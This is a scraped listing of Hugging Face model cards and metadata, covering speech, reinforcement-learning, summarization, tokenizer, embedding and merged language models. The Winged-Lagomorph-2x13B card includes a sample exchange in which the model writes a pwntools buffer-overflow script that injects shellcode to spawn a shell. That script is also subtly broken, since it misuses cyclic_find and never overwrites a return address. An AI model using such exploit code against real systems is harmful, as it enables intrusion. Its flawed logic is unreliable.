### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
zhangyanchao/whisper-small-zh_CN | zhangyanchao | 2024-01-22T01:09:20Z | 60 | 2 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"whisper",
"automatic-speech-recognition",
"hf-asr-leaderboard",
"generated_from_trainer",
"hi",
"dataset:mozilla-foundation/common_voice_11_0",
"base_model:openai/whisper-small",
"base_model:finetune:openai/whisper-small",
"license:apache-2.0",
"endpoints_compatible",
"region:us"
] | automatic-speech-recognition | 2024-01-19T05:19:31Z | ---
language:
- hi
license: apache-2.0
base_model: openai/whisper-small
tags:
- hf-asr-leaderboard
- generated_from_trainer
datasets:
- mozilla-foundation/common_voice_11_0
model-index:
- name: Whisper Small zh_CN - Charles.djang
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# Whisper Small zh_CN - Charles.djang
This model is a fine-tuned version of [openai/whisper-small](https://huggingface.co/openai/whisper-small) on the Common Voice 11.0 dataset.
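A minimal, hypothetical inference sketch (the model id comes from this repository; `audio.wav` is a placeholder path):
```python
from transformers import pipeline

# Hypothetical usage sketch: transcribe a local audio file with this fine-tuned checkpoint.
asr = pipeline(
    "automatic-speech-recognition",
    model="zhangyanchao/whisper-small-zh_CN",
)
print(asr("audio.wav")["text"])  # decoding audio files requires ffmpeg to be installed
```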
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 1e-05
- train_batch_size: 16
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- lr_scheduler_warmup_steps: 500
- training_steps: 4000
- mixed_precision_training: Native AMP
### Framework versions
- Transformers 4.37.0.dev0
- Pytorch 2.1.2+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
homerquan/ppo-SnowballTarget | homerquan | 2024-01-22T01:04:49Z | 1 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] | reinforcement-learning | 2024-01-22T01:04:45Z | ---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial to learn to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: homerquan/ppo-SnowballTarget
3. Select your *.nn / *.onnx file
4. Click on Watch the agent play 👀
|
phitime/flan-t5-base-finetuned-mlsum-tr | phitime | 2024-01-22T00:40:56Z | 14 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"t5",
"text2text-generation",
"generated_from_trainer",
"base_model:google/flan-t5-base",
"base_model:finetune:google/flan-t5-base",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text2text-generation | 2024-01-21T21:53:23Z | ---
license: apache-2.0
base_model: google/flan-t5-base
tags:
- generated_from_trainer
metrics:
- rouge
model-index:
- name: flan-t5-base-finetuned-mlsum-tr
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# flan-t5-base-finetuned-mlsum-tr
This model is a fine-tuned version of [google/flan-t5-base](https://huggingface.co/google/flan-t5-base) on an unknown dataset.
It achieves the following results on the evaluation set:
- Loss: nan
- Rouge1: 2.171
- Rouge2: 0.9864
- Rougel: 1.8331
- Rougelsum: 1.9493
- Gen Len: 18.4939
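A minimal usage sketch with the standard summarization pipeline is shown below; the Turkish input is a placeholder, and because the reported validation loss is `nan`, outputs should be checked carefully.
```python
from transformers import pipeline
summarizer = pipeline("summarization", model="phitime/flan-t5-base-finetuned-mlsum-tr")
article = "Türkiye'de yenilenebilir enerji yatırımları son yıllarda hızla artıyor..."  # placeholder article
print(summarizer(article, max_new_tokens=64)[0]["summary_text"])
```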
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 2e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 1
- mixed_precision_training: Native AMP
### Training results
| Training Loss | Epoch | Step | Validation Loss | Rouge1 | Rouge2 | Rougel | Rougelsum | Gen Len |
|:-------------:|:-----:|:-----:|:---------------:|:------:|:------:|:------:|:---------:|:-------:|
| 0.0 | 1.0 | 31160 | nan | 2.171 | 0.9864 | 1.8331 | 1.9493 | 18.4939 |
### Framework versions
- Transformers 4.35.2
- Pytorch 2.1.0+cu121
- Datasets 2.16.1
- Tokenizers 0.15.0
|
dustalov/wikitext-wordlevel | dustalov | 2024-01-22T00:39:29Z | 0 | 1 | tokenizers | [
"tokenizers",
"tokenizer",
"wordlevel",
"wikitext",
"en",
"dataset:wikitext",
"license:cc-by-sa-3.0",
"region:us"
] | null | 2024-01-10T20:26:37Z | ---
library_name: tokenizers
license: cc-by-sa-3.0
datasets:
- wikitext
language:
- en
tags:
- tokenizer
- wordlevel
- tokenizers
- wikitext
inference: false
---
# WikiText-WordLevel
This is a simple word-level tokenizer created using the [Tokenizers](https://github.com/huggingface/tokenizers) library. It was trained for educational purposes on the combined train, validation, and test splits of the [WikiText-103](https://huggingface.co/datasets/wikitext) corpus.
- Tokenizer Type: Word-Level
- Vocabulary Size: 75K
- Special Tokens: `<s>` (start of sequence), `</s>` (end of sequence), `<unk>` (unknown token)
- Normalization: [NFC](https://en.wikipedia.org/wiki/Unicode_equivalence#Normal_forms) (Normalization Form Canonical Composition), Strip, Lowercase
- Pre-tokenization: Whitespace
- Code: [wikitext-wordlevel.py](wikitext-wordlevel.py)
The tokenizer can be used as simply as follows.
```python
from tokenizers import Tokenizer
tokenizer = Tokenizer.from_pretrained('dustalov/wikitext-wordlevel')
tokenizer.encode("I'll see you soon").ids # => [68, 14, 2746, 577, 184, 595]
tokenizer.encode("I'll see you soon").tokens # => ['i', "'", 'll', 'see', 'you', 'soon']
tokenizer.decode([68, 14, 2746, 577, 184, 595]) # => "i ' ll see you soon"
```
|
kimwooglae/AISquare-Instruct-SOLAR-10.7b-v0.5.31 | kimwooglae | 2024-01-22T00:31:19Z | 1,369 | 0 | transformers | [
"transformers",
"pytorch",
"llama",
"text-generation",
"en",
"license:cc-by-nc-4.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-21T23:04:42Z | ---
language:
- en
pipeline_tag: text-generation
license: cc-by-nc-4.0
---
# AISquare-Instruct-SOLAR-10.7b-v0.5.31
## Model Details
**Developed by**
[Inswave Systems](https://www.inswave.com) UI Platform Team
**Base Model**
[upstage/SOLAR-10.7B-v1.0](https://huggingface.co/upstage/SOLAR-10.7B-v1.0)
# Implementation Code
```python
from transformers import AutoModelForCausalLM, AutoTokenizer
import torch
repo = "kimwooglae/AISquare-Instruct-SOLAR-10.7b-v0.5.31"
model = AutoModelForCausalLM.from_pretrained(
repo,
return_dict=True,
torch_dtype=torch.float16,
device_map='auto'
)
tokenizer = AutoTokenizer.from_pretrained(repo)
```
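A hedged generation follow-up to the snippet above; the prompt wording and decoding settings are illustrative and not prescribed by the authors.
```python
# Continues from the snippet above (model and tokenizer already loaded).
prompt = "Explain the difference between LoRA and full fine-tuning."  # illustrative prompt
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=256, do_sample=True, temperature=0.7)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```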
--- |
Nerdofdot/Nerdofdot_nickprock_sentence-bert-base-italian-uncased_TM_FTM | Nerdofdot | 2024-01-22T00:13:18Z | 4 | 0 | sentence-transformers | [
"sentence-transformers",
"safetensors",
"bert",
"feature-extraction",
"sentence-similarity",
"transformers",
"autotrain_compatible",
"text-embeddings-inference",
"endpoints_compatible",
"region:us"
] | sentence-similarity | 2024-01-22T00:13:03Z | ---
pipeline_tag: sentence-similarity
tags:
- sentence-transformers
- feature-extraction
- sentence-similarity
- transformers
---
# Nerdofdot/Nerdofdot_nickprock_sentence-bert-base-italian-uncased_TM_FTM
This is a [sentence-transformers](https://www.SBERT.net) model: It maps sentences & paragraphs to a 768 dimensional dense vector space and can be used for tasks like clustering or semantic search.
<!--- Describe your model here -->
## Usage (Sentence-Transformers)
Using this model becomes easy when you have [sentence-transformers](https://www.SBERT.net) installed:
```
pip install -U sentence-transformers
```
Then you can use the model like this:
```python
from sentence_transformers import SentenceTransformer
sentences = ["This is an example sentence", "Each sentence is converted"]
model = SentenceTransformer('Nerdofdot/Nerdofdot_nickprock_sentence-bert-base-italian-uncased_TM_FTM')
embeddings = model.encode(sentences)
print(embeddings)
```
## Usage (HuggingFace Transformers)
Without [sentence-transformers](https://www.SBERT.net), you can use the model like this: first, you pass your input through the transformer model, then you apply the right pooling operation on top of the contextualized word embeddings.
```python
from transformers import AutoTokenizer, AutoModel
import torch
#Mean Pooling - Take attention mask into account for correct averaging
def mean_pooling(model_output, attention_mask):
token_embeddings = model_output[0] #First element of model_output contains all token embeddings
input_mask_expanded = attention_mask.unsqueeze(-1).expand(token_embeddings.size()).float()
return torch.sum(token_embeddings * input_mask_expanded, 1) / torch.clamp(input_mask_expanded.sum(1), min=1e-9)
# Sentences we want sentence embeddings for
sentences = ['This is an example sentence', 'Each sentence is converted']
# Load model from HuggingFace Hub
tokenizer = AutoTokenizer.from_pretrained('Nerdofdot/Nerdofdot_nickprock_sentence-bert-base-italian-uncased_TM_FTM')
model = AutoModel.from_pretrained('Nerdofdot/Nerdofdot_nickprock_sentence-bert-base-italian-uncased_TM_FTM')
# Tokenize sentences
encoded_input = tokenizer(sentences, padding=True, truncation=True, return_tensors='pt')
# Compute token embeddings
with torch.no_grad():
model_output = model(**encoded_input)
# Perform pooling. In this case, mean pooling.
sentence_embeddings = mean_pooling(model_output, encoded_input['attention_mask'])
print("Sentence embeddings:")
print(sentence_embeddings)
```
## Evaluation Results
<!--- Describe how your model was evaluated -->
For an automated evaluation of this model, see the *Sentence Embeddings Benchmark*: [https://seb.sbert.net](https://seb.sbert.net?model_name=Nerdofdot/Nerdofdot_nickprock_sentence-bert-base-italian-uncased_TM_FTM)
## Training
The model was trained with the parameters:
**DataLoader**:
`torch.utils.data.dataloader.DataLoader` of length 7975 with parameters:
```
{'batch_size': 10, 'sampler': 'torch.utils.data.sampler.RandomSampler', 'batch_sampler': 'torch.utils.data.sampler.BatchSampler'}
```
**Loss**:
`sentence_transformers.losses.TripletLoss.TripletLoss` with parameters:
```
{'distance_metric': 'TripletDistanceMetric.EUCLIDEAN', 'triplet_margin': 0.4}
```
Parameters of the fit()-Method:
```
{
"epochs": 3,
"evaluation_steps": 0,
"evaluator": "NoneType",
"max_grad_norm": 1,
"optimizer_class": "<class 'torch.optim.adamw.AdamW'>",
"optimizer_params": {
"lr": 2e-05
},
"scheduler": "WarmupLinear",
"steps_per_epoch": null,
"warmup_steps": 2392,
"weight_decay": 0.01
}
```
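For reference, the configuration above corresponds roughly to the hedged training sketch below; the base checkpoint name and the triplet texts are assumptions, and only the hyperparameters mirror the listed values.
```python
from torch.utils.data import DataLoader
from sentence_transformers import SentenceTransformer, InputExample, losses
# Assumed base checkpoint, inferred from the repository name.
model = SentenceTransformer("nickprock/sentence-bert-base-italian-uncased")
# Placeholder triplet: (anchor, positive, negative).
train_examples = [InputExample(texts=["frase di ancoraggio", "frase simile", "frase non correlata"])]
train_dataloader = DataLoader(train_examples, shuffle=True, batch_size=10)
train_loss = losses.TripletLoss(model=model, distance_metric=losses.TripletDistanceMetric.EUCLIDEAN, triplet_margin=0.4)
model.fit(
    train_objectives=[(train_dataloader, train_loss)],
    epochs=3,
    warmup_steps=2392,
    optimizer_params={"lr": 2e-05},
    weight_decay=0.01,
)
```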
## Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: BertModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False})
)
```
## Citing & Authors
<!--- Describe where people can find more information --> |
lodrick-the-lafted/Winged-Lagomorph-2x13B | lodrick-the-lafted | 2024-01-22T00:11:20Z | 19 | 3 | transformers | [
"transformers",
"safetensors",
"mixtral",
"text-generation",
"moe",
"merge",
"custom_code",
"base_model:codellama/CodeLlama-13b-Instruct-hf",
"base_model:finetune:codellama/CodeLlama-13b-Instruct-hf",
"license:llama2",
"model-index",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-16T21:43:46Z | ---
license: llama2
tags:
- moe
- merge
base_model: codellama/CodeLlama-13b-Instruct-hf
model-index:
- name: Winged-Lagomorph-2x13B
results:
- task:
type: text-generation
name: Text Generation
dataset:
name: AI2 Reasoning Challenge (25-Shot)
type: ai2_arc
config: ARC-Challenge
split: test
args:
num_few_shot: 25
metrics:
- type: acc_norm
value: 47.95
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: HellaSwag (10-Shot)
type: hellaswag
split: validation
args:
num_few_shot: 10
metrics:
- type: acc_norm
value: 69.39
name: normalized accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: MMLU (5-Shot)
type: cais/mmlu
config: all
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 44.5
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: TruthfulQA (0-shot)
type: truthful_qa
config: multiple_choice
split: validation
args:
num_few_shot: 0
metrics:
- type: mc2
value: 44.54
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: Winogrande (5-shot)
type: winogrande
config: winogrande_xl
split: validation
args:
num_few_shot: 5
metrics:
- type: acc
value: 67.4
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
- task:
type: text-generation
name: Text Generation
dataset:
name: GSM8k (5-shot)
type: gsm8k
config: main
split: test
args:
num_few_shot: 5
metrics:
- type: acc
value: 25.63
name: accuracy
source:
url: https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard?query=lodrick-the-lafted/Winged-Lagomorph-2x13B
name: Open LLM Leaderboard
---
Grafted WhiteRabbitNeo-13B-v1 and NexusRaven-V2-13B with mergekit. Use the WhiteRabbitNeo template for regular code, and the NR template for function calling.
<img src=https://huggingface.co/lodrick-the-lafted/Winged-Lagomorph-2x13B/resolve/main/winged-lago.png>
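A minimal loading sketch, assuming the `custom_code` remote-code path is required; prompt formatting should follow the WhiteRabbitNeo or NexusRaven templates mentioned above.
```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
repo = "lodrick-the-lafted/Winged-Lagomorph-2x13B"
tokenizer = AutoTokenizer.from_pretrained(repo, trust_remote_code=True)
model = AutoModelForCausalLM.from_pretrained(repo, torch_dtype=torch.float16, device_map="auto", trust_remote_code=True)
```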
SYSTEM: Answer the Question by exploring multiple reasoning paths as follows:
- First, carefully analyze the question to extract the key information components and break it down into logical sub-questions. This helps set up the framework for reasoning. The goal is to construct an internal search tree.
- For each sub-question, leverage your knowledge to generate 2-3 intermediate thoughts that represent steps towards an answer. The thoughts aim to reframe, provide context, analyze assumptions, or bridge concepts.
- Evaluate the clarity, relevance, logical flow and coverage of concepts for each thought option. Clear and relevant thoughts that connect well with each other will score higher.
- Based on the thought evaluations, deliberate to construct a chain of reasoning that stitches together the strongest thoughts in a natural order.
- If the current chain is determined to not fully answer the question, backtrack and explore alternative paths by substituting different high-scoring thoughts.
- Throughout the reasoning process, aim to provide explanatory details on thought process rather than just state conclusions, including briefly noting why some thoughts were deemed less ideal.
- Once a reasoning chain is constructed that thoroughly answers all sub-questions in a clear, logical manner, synthesize the key insights into a final concise answer.
- Please note that while the focus is on the final answer in the response, it should also include intermediate thoughts inline to illustrate the deliberative reasoning process.
In summary, leverage a Tree of Thoughts approach to actively explore multiple reasoning paths, evaluate thoughts heuristically, and explain the process - with the goal of producing insightful answers.
USER: Write a pwntools script that overflows a 64 character buffer from stdin.
ASSISTANT: To write a pwntools script that overflows a 64-character buffer from stdin, we need to follow these steps:
1. **Identify the vulnerable program**: Find the program that has a buffer overflow vulnerability. This can be done by analyzing the program's source code or by using tools like `gdb` or `valgrind`.
2. **Set up the environment**: Install pwntools and any other necessary dependencies.
3. **Create a pwntools script**: Start by importing the `pwn` module and setting up the connection to the vulnerable program.
4. **Find the offset**: Use the `cyclic` function from pwntools to generate a pattern that will help us find the offset.
5. **Overflow the buffer**: Send the generated pattern to the vulnerable program, and then send additional data to overwrite the return address on the stack.
6. **Control the execution flow**: Overwrite the return address with the address of a shellcode or a function that will give us a shell.
7. **Execute the script**: Run the script and observe the results.
Here's an example pwntools script that overflows a 64-character buffer:
```python
from pwn import *
# Set up the connection to the vulnerable program
p = process('./vulnerable_program')
# Find the offset using cyclic
offset = cyclic_find(b'A'*64)
# Generate shellcode
shellcode = asm(shellcraft.sh())
# Overflow the buffer
payload = b'A' * offset + shellcode
p.sendline(payload)
# Execute the script
p.interactive()
```
In this example, `vulnerable_program` is the name of the vulnerable program, and `shellcraft.sh()` is a function from pwntools that generates shellcode for a Linux/x86-64 system. The `cyclic_find` function is used to find the offset at which the buffer overflow occurs.
Please note that this script is a basic example and may not work in all cases. It's important to tailor the script to the specific vulnerability and environment you are working with.
# [Open LLM Leaderboard Evaluation Results](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard)
Detailed results can be found [here](https://huggingface.co/datasets/open-llm-leaderboard/details_lodrick-the-lafted__Winged-Lagomorph-2x13B)
| Metric |Value|
|---------------------------------|----:|
|Avg. |49.90|
|AI2 Reasoning Challenge (25-Shot)|47.95|
|HellaSwag (10-Shot) |69.39|
|MMLU (5-Shot) |44.50|
|TruthfulQA (0-shot) |44.54|
|Winogrande (5-shot) |67.40|
|GSM8k (5-shot) |25.63|
|
Marcus2112/ppo-SnowballTarget | Marcus2112 | 2024-01-22T00:09:47Z | 8 | 0 | ml-agents | [
"ml-agents",
"tensorboard",
"onnx",
"SnowballTarget",
"deep-reinforcement-learning",
"reinforcement-learning",
"ML-Agents-SnowballTarget",
"region:us"
] | reinforcement-learning | 2024-01-22T00:09:42Z | ---
library_name: ml-agents
tags:
- SnowballTarget
- deep-reinforcement-learning
- reinforcement-learning
- ML-Agents-SnowballTarget
---
# **ppo** Agent playing **SnowballTarget**
This is a trained model of a **ppo** agent playing **SnowballTarget**
using the [Unity ML-Agents Library](https://github.com/Unity-Technologies/ml-agents).
## Usage (with ML-Agents)
The Documentation: https://unity-technologies.github.io/ml-agents/ML-Agents-Toolkit-Documentation/
We wrote a complete tutorial that teaches you to train your first agent using ML-Agents and publish it to the Hub:
- A *short tutorial* where you teach Huggy the Dog 🐶 to fetch the stick and then play with him directly in your
browser: https://huggingface.co/learn/deep-rl-course/unitbonus1/introduction
- A *longer tutorial* to understand how ML-Agents works:
https://huggingface.co/learn/deep-rl-course/unit5/introduction
### Resume the training
```bash
mlagents-learn <your_configuration_file_path.yaml> --run-id=<run_id> --resume
```
### Watch your Agent play
You can watch your agent **playing directly in your browser**
1. If the environment is part of ML-Agents official environments, go to https://huggingface.co/unity
2. Find your model_id: koppelmann/ppo-SnowballTarget
3. Select your *.nn / *.onnx file
4. Click on Watch the agent play 👀
|
moreh/MoMo-72B-lora-1.8.6-DPO | moreh | 2024-01-22T00:09:36Z | 164 | 32 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"en",
"arxiv:2305.18290",
"arxiv:2106.09685",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-16T02:11:50Z | ---
license: mit
language:
- en
---
# **Introduction**
MoMo-72B-lora-1.8.6-DPO is trained via Direct Preference Optimization([DPO](https://arxiv.org/abs/2305.18290)) from [MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) as its base model, with several optimizations in hyperparameters.
[MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) is trained via Supervised Fine-Tuning (SFT) using [LoRA](https://arxiv.org/abs/2106.09685), with the QWEN-72B model as its base-model.
Note that we did not use any form of weight merging.
For leaderboard submission, the trained weights were realigned for compatibility with Llama.
MoMo-72B is trained using **[Moreh](https://moreh.io/)**'s [MoAI platform](https://moreh.io/product), which simplifies the training of large-scale models, and AMD's MI250 GPU.
## Details
### Used Libraries
- torch
- peft
### Used Datasets
- [slimorca](https://huggingface.co/datasets/Open-Orca/SlimOrca)
- [truthy](https://huggingface.co/datasets/jondurbin/truthy-dpo-v0.1)
- [orca_dpo_pairs](https://huggingface.co/datasets/Intel/orca_dpo_pairs)
- No other dataset was used
- No benchmark test sets or their training sets were used
- [data contamination check](https://github.com/swj0419/detect-pretrain-code-contamination) result
| Model | ARC | MMLU | TruthfulQA | GSM8K |
|------------------------------|-------|-------|-------|-------|
| **V1.8.6(result < 0.1, %)**| TBU |TBU | 0.73 | TBU |
### Used Environments
- AMD MI250 & MoAI platform
- Please visit https://moreh.io/product for more information about MoAI platform
- Or, contact us directly [[email protected]](mailto:[email protected])
## How to use
```python
# pip install transformers==4.35.2
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("moreh/MoMo-72B-lora-1.8.6-DPO")
model = AutoModelForCausalLM.from_pretrained(
"moreh/MoMo-72B-lora-1.8.6-DPO"
)
``` |
moreh/MoMo-72B-lora-1.8.4-DPO | moreh | 2024-01-22T00:08:48Z | 164 | 11 | transformers | [
"transformers",
"safetensors",
"llama",
"text-generation",
"en",
"arxiv:2305.18290",
"arxiv:2106.09685",
"license:mit",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-12T02:36:09Z | ---
license: mit
language:
- en
---
# **Introduction**
MoMo-72B-lora-1.8.4-DPO is trained via Direct Preference Optimization([DPO](https://arxiv.org/abs/2305.18290)) from [MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) as its base model, with several optimizations in hyperparameters.
[MoMo-72B-LoRA-V1.4](https://huggingface.co/moreh/MoMo-72B-LoRA-V1.4) is trained via Supervised Fine-Tuning (SFT) using [LoRA](https://arxiv.org/abs/2106.09685), with the QWEN-72B model as its base-model.
Note that we did not use any form of weight merging.
For leaderboard submission, the trained weights were realigned for compatibility with Llama.
MoMo-72B is trained using **[Moreh](https://moreh.io/)**'s [MoAI platform](https://moreh.io/product), which simplifies the training of large-scale models, and AMD's MI250 GPU.
## Details
### Used Libraries
- torch
- peft
### Used Datasets
- [slimorca](https://huggingface.co/datasets/Open-Orca/SlimOrca)
- [truthy](https://huggingface.co/datasets/jondurbin/truthy-dpo-v0.1)
- [orca_dpo_pairs](https://huggingface.co/datasets/Intel/orca_dpo_pairs)
- No other dataset was used
- No benchmark test sets or their training sets were used
- [data contamination check](https://github.com/swj0419/detect-pretrain-code-contamination) result
| Model | ARC | MMLU | TruthfulQA | GSM8K |
|------------------------------|-------|-------|-------|-------|
| **V1.4(result < 0.1, %)**| TBU |TBU | TBU | TBU |
### Used Environments
- AMD MI250 & MoAI platform
- Please visit https://moreh.io/product for more information about MoAI platform
- Or, contact us directly [[email protected]](mailto:[email protected])
## How to use
```python
# pip install transformers==4.35.2
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer
tokenizer = AutoTokenizer.from_pretrained("moreh/MoMo-72B-lora-1.8.4-DPO")
model = AutoModelForCausalLM.from_pretrained(
"moreh/MoMo-72B-lora-1.8.4-DPO"
)
``` |
Vasanth/Beast-Soul | Vasanth | 2024-01-22T00:02:12Z | 49 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"merge",
"mergekit",
"lazymergekit",
"base_model:decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP",
"base_model:merge:decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP",
"base_model:udkai/Turdus",
"base_model:merge:udkai/Turdus",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] | text-generation | 2024-01-21T23:51:49Z | ---
tags:
- merge
- mergekit
- lazymergekit
base_model:
- udkai/Turdus
- decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP
license: apache-2.0
---
# Beast-Soul
Beast-Soul is a merge of the following models using [LazyMergekit](https://colab.research.google.com/drive/1obulZ1ROXHjYLn6PPZJwRR6GzgQogxxb?usp=sharing):
* [udkai/Turdus](https://huggingface.co/udkai/Turdus)
* [decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP](https://huggingface.co/decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP)
## 🧩 Configuration
```yaml
slices:
- sources:
- model: udkai/Turdus
layer_range: [0, 32]
- model: decruz07/kellemar-DPO-Orca-Distilled-7B-SLERP
layer_range: [0, 32]
merge_method: slerp
base_model: OpenPipe/mistral-ft-optimized-1218
parameters:
t:
- filter: self_attn
value: [0, 0.5, 0.3, 0.7, 1]
- filter: mlp
value: [1, 0.5, 0.7, 0.3, 0]
- value: 0.5
dtype: bfloat16
```
## 💻 Usage
```python
!pip install -qU transformers accelerate
from transformers import AutoTokenizer
import transformers
import torch
model = "Vasanth/Beast-Soul"
messages = [{"role": "user", "content": "What is a large language model?"}]
tokenizer = AutoTokenizer.from_pretrained(model)
prompt = tokenizer.apply_chat_template(messages, tokenize=False, add_generation_prompt=True)
pipeline = transformers.pipeline(
"text-generation",
model=model,
torch_dtype=torch.float16,
device_map="auto",
)
outputs = pipeline(prompt, max_new_tokens=256, do_sample=True, temperature=0.7, top_k=50, top_p=0.95)
print(outputs[0]["generated_text"])
``` |
sanalsprasad/train_debug | sanalsprasad | 2024-01-21T23:57:30Z | 6 | 0 | transformers | [
"transformers",
"tensorboard",
"safetensors",
"roberta",
"text-classification",
"generated_from_trainer",
"base_model:openai-community/roberta-base-openai-detector",
"base_model:finetune:openai-community/roberta-base-openai-detector",
"license:mit",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] | text-classification | 2024-01-11T00:51:24Z | ---
license: mit
base_model: openai-community/roberta-base-openai-detector
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: train_debug
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
# train_debug
This model is a fine-tuned version of [openai-community/roberta-base-openai-detector](https://huggingface.co/openai-community/roberta-base-openai-detector) on the None dataset.
It achieves the following results on the evaluation set:
- Loss: 0.0098
- Accuracy: 0.999
- Roc Auc: 1.0000
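A hedged classification sketch; the input sentence is a placeholder, and the label names come from the base detector's configuration rather than from this card.
```python
from transformers import pipeline
clf = pipeline("text-classification", model="sanalsprasad/train_debug")
print(clf("This paragraph was produced by a large language model."))  # placeholder input
```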
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 5e-05
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Adam with betas=(0.9,0.999) and epsilon=1e-08
- lr_scheduler_type: linear
- num_epochs: 2
### Training results
| Training Loss | Epoch | Step | Validation Loss | Accuracy | Roc Auc |
|:-------------:|:-----:|:-----:|:---------------:|:--------:|:-------:|
| 0.0336 | 1.0 | 6250 | 0.0298 | 0.992 | 0.9999 |
| 0.0085 | 2.0 | 12500 | 0.0098 | 0.999 | 1.0000 |
### Framework versions
- Transformers 4.36.0
- Pytorch 2.0.0
- Datasets 2.1.0
- Tokenizers 0.15.0
|
fionazhang/mistral-environment-data | fionazhang | 2024-01-21T23:55:53Z | 4 | 0 | transformers | [
"transformers",
"safetensors",
"mistral",
"text-generation",
"trl",
"sft",
"generated_from_trainer",
"base_model:mistralai/Mistral-7B-v0.1",
"base_model:finetune:mistralai/Mistral-7B-v0.1",
"license:apache-2.0",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
